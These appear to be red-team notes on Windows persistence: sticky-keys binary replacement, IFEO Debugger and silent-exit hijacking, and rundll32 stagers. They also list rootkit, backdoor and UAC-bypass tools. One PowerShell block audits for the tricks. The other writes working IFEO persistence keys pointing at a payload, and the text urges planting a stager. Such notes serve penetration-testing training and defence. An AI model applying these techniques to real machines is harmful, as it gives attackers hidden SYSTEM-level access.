chromebackdoor - Chromebackdoor is a proof-of-concept pentest tool that uses a man-in-the-browser (MITB) technique: it generates a Windows ".exe" which, once launched, runs a malicious extension or script in the most popular browsers and sends all DOM data to the command and control server.
cymothoa - Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them.
casper-fs - Casper-fs is a custom Linux Kernel Module generator that protects or hides a custom list of files. Each LKM carries the resources to protect or hide the files listed in a YAML rule file. Yes, not even root has permission to see the files or to edit or remove them. The files can only be read, edited, or deleted after the user sends the proper key to the custom device, which releases the action in the file system.
OSRipper - AV-evading OSX backdoor and crypter framework.
TripleCross - A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.
Nidhogg - Nidhogg is an all-in-one, simple-to-use rootkit for red teams.
If using Kerberos, the username and password can be replaced with /authority:"Kerberos:[Domain]\[Server]"
One common, low-skill method of achieving persistence is replacing the binary files of the Windows accessibility features with a malicious binary of the attacker's own, or simply with a renamed copy of the Windows 'cmd.exe'.
When a user tries to use an accessibility feature, for example Sticky Keys (pressing Shift five times), Windows executes the 'sethc.exe' binary, which the attacker may have replaced with 'cmd.exe'. The result is that the user is presented with a Windows command prompt.
Because the Windows accessibility features are available from the lock screen of desktops and servers, they can be triggered without any credentials; and because no user is logged in, the binary is started by winlogon.exe on the secure desktop rather than on behalf of a user, so the malicious binary runs under the context of the SYSTEM account. Desktops and servers which have RDP enabled increase the risk, since an attacker can trigger the persistence mechanism remotely from the RDP login screen.
The binaries for the accessibility features can be found in C:\Windows\System32\ (sethc.exe, utilman.exe, osk.exe, magnify.exe, narrator.exe, displayswitch.exe). They are owned by TrustedInstaller, so replacing one requires an administrator to first take ownership and grant write access (takeown / icacls); a replaced copy of cmd.exe still carries a valid catalog signature, so signature checks alone will not catch it.
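The following PowerShell audit is an added example (not part of the original notes or of any of the tools listed above) that checks the accessibility binaries above for the replacement trick described. The function names and the list of binaries checked are this example's own choices; run it from an elevated prompt on the host being checked.

```powershell
# Added example: audit the Windows accessibility binaries for the "sticky keys" replacement.
# A renamed cmd.exe is caught by three independent signals: its SHA256 equals cmd.exe's,
# its version resource still says OriginalFilename = "Cmd.Exe", and (for a non-Microsoft
# payload) its Authenticode/catalog signature is not Valid.

$AccessibilityBinaries = @('sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe',
                           'narrator.exe', 'displayswitch.exe', 'atbroker.exe')

function Test-AccessibilityBinaries {
    $system32 = Join-Path $env:SystemRoot 'System32'
    $cmdHash  = (Get-FileHash -Algorithm SHA256 (Join-Path $system32 'cmd.exe')).Hash

    foreach ($name in $AccessibilityBinaries) {
        $path = Join-Path $system32 $name
        if (-not (Test-Path $path)) { continue }

        $hash = (Get-FileHash -Algorithm SHA256 $path).Hash
        $sig  = Get-AuthenticodeSignature $path
        $orig = (Get-Item $path).VersionInfo.OriginalFilename
        $stem = [IO.Path]::GetFileNameWithoutExtension($name)

        $findings = @()
        if ($hash -eq $cmdHash)      { $findings += 'byte-identical to cmd.exe' }
        if ($sig.Status -ne 'Valid') { $findings += "signature status $($sig.Status)" }
        # A renamed copy keeps the original file's internal name in its version resource,
        # and a catalog-signed copy is still "Valid", so this check matters even when the
        # signature check passes.
        if ($orig -and ($orig -notlike "$stem*")) { $findings += "OriginalFilename is '$orig'" }

        [pscustomobject]@{
            Binary     = $name
            SHA256     = $hash
            Suspicious = ($findings.Count -gt 0)
            Findings   = ($findings -join '; ')
        }
    }
}

Test-AccessibilityBinaries | Format-Table -AutoSize
```

On a clean host every row reports Suspicious = False. Compare the SHA256 column against a known-good image of the same Windows build if the OriginalFilename check is inconclusive for a given binary.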
The Image File Execution Options (IFEO) feature allows a debugger to be registered for a program in the registry; the registered binary is then executed whenever the target is launched, with the target's own command line appended to it.
The entry is a subkey named after the target executable under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options, holding a string value (REG_SZ) called 'Debugger' whose data is the path and binary name of the payload, e.g. 'C:\Users\Administrator\Malware.exe'.
This is a convenient way for malicious actors to gain persistence on target machines by abusing a legitimate feature of the Windows OS.
Plant your stager, in whatever form you choose (usually an .exe), and point the Debugger value of the target's IFEO subkey at it.
PTFM: Registry Injection - pg. 25
Image File Execution Options Injection - IFEO
The Image File Execution Options (IFEO) registry key is a Windows feature commonly used by developers to attach a debugger to their application.
IFEOs can be set directly in the registry or through Global Flags (gflags.exe), a tool from the Debugging Tools for Windows that ships with the Windows 10 SDK.
IFEOs can also enable a monitor program to be launched on "silent exit" of another program (when it terminates itself, or is terminated by a second, non-kernel-mode process). This variant needs the silent-exit monitoring flag in the target's IFEO subkey and a matching subkey under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit naming the monitor process.
So an administrator-level user can have any binary executed after another application closes, or any binary executed as a "debugger" whenever another application opens. This means that if a malicious actor gains administrative access to a target machine (both keys live under HKLM), they can abuse these values to obtain persistence, and privilege escalation, by planting a malicious executable that is loaded and run whenever a specified program (e.g. notepad.exe) opens or closes. The payload inherits the privileges of whoever launched the target; for a binary started by winlogon.exe, such as sethc.exe from the lock screen, that is SYSTEM.
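The following PowerShell is an added example covering the Debugger variant and the silent-exit variant described in the two IFEO sections above; it is not code from the original notes or from the PTFM. The target 'notepad.exe' and the payload path 'C:\Users\Administrator\Malware.exe' follow the text; the function names are this example's own. Use it in a lab from an elevated prompt (endpoint protection will usually flag these writes).

```powershell
# Added example: IFEO persistence, both variants, plus an audit that lists what is planted.
$Ifeo       = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$SilentExit = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'

# Variant 1: 'Debugger' value. Windows starts the payload instead of the target, passing the
# target's full command line as arguments (a real debugger would then launch it).
function Set-IfeoDebugger {
    param([string]$Target, [string]$Payload)
    $key = Join-Path $Ifeo $Target
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'Debugger' -Value $Payload -Type String
}

# Variant 2: silent-exit monitor. GlobalFlag 0x200 (FLG_MONITOR_SILENT_PROCESS_EXIT) on the
# IFEO subkey turns monitoring on; SilentProcessExit\<target> says what to do: ReportingMode
# bit 0x1 = launch MonitorProcess when the target exits.
function Set-IfeoSilentExitMonitor {
    param([string]$Target, [string]$Payload)
    $ifeoKey = Join-Path $Ifeo $Target
    New-Item -Path $ifeoKey -Force | Out-Null
    Set-ItemProperty -Path $ifeoKey -Name 'GlobalFlag' -Value 0x200 -Type DWord
    $exitKey = Join-Path $SilentExit $Target
    New-Item -Path $exitKey -Force | Out-Null
    Set-ItemProperty -Path $exitKey -Name 'ReportingMode'  -Value 1 -Type DWord
    Set-ItemProperty -Path $exitKey -Name 'MonitorProcess' -Value $Payload -Type String
}

# Audit: every IFEO subkey carrying a Debugger value and every silent-exit monitor.
# A clean workstation normally has none; a developer box may legitimately list a real debugger.
function Get-IfeoPersistence {
    Get-ChildItem $Ifeo -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = (Get-ItemProperty $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { [pscustomobject]@{ Type = 'Debugger'; Target = $_.PSChildName; Payload = $dbg } }
    }
    Get-ChildItem $SilentExit -ErrorAction SilentlyContinue | ForEach-Object {
        $mon = (Get-ItemProperty $_.PSPath -Name MonitorProcess -ErrorAction SilentlyContinue).MonitorProcess
        if ($mon) { [pscustomobject]@{ Type = 'SilentExitMonitor'; Target = $_.PSChildName; Payload = $mon } }
    }
}

# Cleanup for the lab target.
function Remove-IfeoPersistence {
    param([string]$Target)
    Remove-Item (Join-Path $Ifeo $Target)       -Recurse -Force -ErrorAction SilentlyContinue
    Remove-Item (Join-Path $SilentExit $Target) -Recurse -Force -ErrorAction SilentlyContinue
}

# Lab walk-through: plant both variants on notepad.exe, list them, then remove them.
Set-IfeoDebugger          -Target 'notepad.exe' -Payload 'C:\Users\Administrator\Malware.exe'
Set-IfeoSilentExitMonitor -Target 'notepad.exe' -Payload 'C:\Users\Administrator\Malware.exe'
Get-IfeoPersistence | Format-Table -AutoSize
Remove-IfeoPersistence -Target 'notepad.exe'
```

The same Get-IfeoPersistence audit is what to run when checking a host for the sticky-keys trick done the "clean" way, i.e. a Debugger value on sethc.exe or utilman.exe instead of a replaced file in System32.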
The .exe you plant will need to be compiled specifically as a Windows service if you are hiding it as a service, or the Service Control Manager will time out waiting for it to report its status and kill it.
Another way is to have your stager drop a DLL instead of an EXE and reference it from a Registry key using rundll32, where the DLL name and the exported entry point are separated by a comma:
>RUNDLL32.exe dllname,entrypoint
It is also possible to store JavaScript in the Registry and have it run from there.
DLLHijackingScanner - This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.